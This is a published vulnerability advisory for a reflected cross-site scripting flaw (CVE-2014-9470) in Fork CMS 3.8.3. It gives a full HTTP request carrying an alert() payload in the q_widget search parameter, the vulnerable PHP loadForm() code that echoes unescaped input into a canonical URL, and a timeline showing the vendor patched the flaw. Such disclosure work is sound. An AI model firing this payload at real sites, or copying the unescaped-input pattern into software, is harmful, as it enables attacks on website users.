# Exploit Title: XSS Vulnerability in Fork CMS 3.8.3
# Google Dork: N/A
# Date: 12/26/2014
# Exploit Author: Le Ngoc phi (phi.n.le@itas.vn) and ITAS Team (www.itas.vn)
# Vendor Homepage: http://www.fork-cms.com
# Software Link: http://www.fork-cms.com/blog/detail/fork-3.8.4-released
# Version: Fork 3.8.3
# Tested on: N/A
# CVE : CVE-2014-9470
::VULNERABILITY DETAIL::
- Vulnerable parameter: q_widget
- Vulnerable file: src/Frontend/Modules/Search/Actions/Index.php
- Vulnerable function: loadForm()
- Attack vector:
GET
/en/search?form=search&q_widget="onmouseover="alert('XSS')"&submit=Search
HTTP/1.1
Host: forkcms.local
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101
Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: track=s%3A32%3A%22f0affe38cada8e7de19ad2edf36f92a6%22%3B;
__utma=23748525.1232410121.1415937482.1419392332.1419480017.3;
__utmz=23748525.1419480017.3.3.utmcsr=google|utmccn=(organic)|utmcmd=organic
|utmctr=(not%20provided);
track=s%3A32%3A%22f0affe38cada8e7de19ad2edf36f92a6%22%3B;
frontend_language=s%3A2%3A%22en%22%3B; _ga=GA1.2.1232410121.1415937482;
PHPSESSID=gailpg881ubvtsmroh2p1bfqn5
Connection: keep-alive
- Vulnerable code:
private function loadForm()
{
// create form
$this->frm = new FrontendForm('search', null, 'get', null, false);
// could also have been submitted by our widget
if (!\SpoonFilter::getGetValue('q', null, '')) {
$_GET['q'] = \SpoonFilter::getGetValue('q_widget', null, '');
}
// create elements
$this->frm->addText(
'q',
null,
255,
'inputText liveSuggest autoComplete',
'inputTextError liveSuggest autoComplete'
);
// since we know the term just here we should set the canonical url
here
$canonicalUrl = SITE_URL .
FrontendNavigation::getURLForBlock('Search');
if (isset($_GET['q']) && $_GET['q'] != '') {
$canonicalUrl .= '?q=' . $_GET['q'];
}
$this->header->setCanonicalUrl($canonicalUrl);
}
::DISCLOSURE::
- 12/25/2014: Detected vulnerability
- 12/25/2014: Inform vendor and the vendor confirmed
- 12/26/2014: Vendor releases patch
- 12/26/2014: ITAS Team publishes information
::REFERENCE::
-
http://www.itas.vn/news/itas-team-found-out-a-cross-site-scripting-vulnerabi
lity-in-fork-cms-70.html
- https://github.com/forkcms/forkcms/issues/1018s
-
https://github.com/forkcms/forkcms/commit/4a7814762adf4f56f932d95146c7e4126d
872114
::DISCLAIMER::
THE INFORMATION PRESENTED HEREIN ARE PROVIDED ?AS IS? WITHOUT WARRANTY OF
ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY
IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE
OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS
A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION
OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE ACCEPTANCE AS IS,
AND AT THE USER'S OWN RISK.
----------------------------------------------------------------------------
----------------
ITAS Team
ITAS Corp. Be protected with us
Office : 24 Dang Thai Mai St., Ward 7, Phu Nhuan District, HCMC.
Tel : +84 - 8 - 38931952 Hotline :
0903445711
Email : <mailto:info@itas.vn> info@itas.vn
<http://www.itas.vn/> www.itas.vn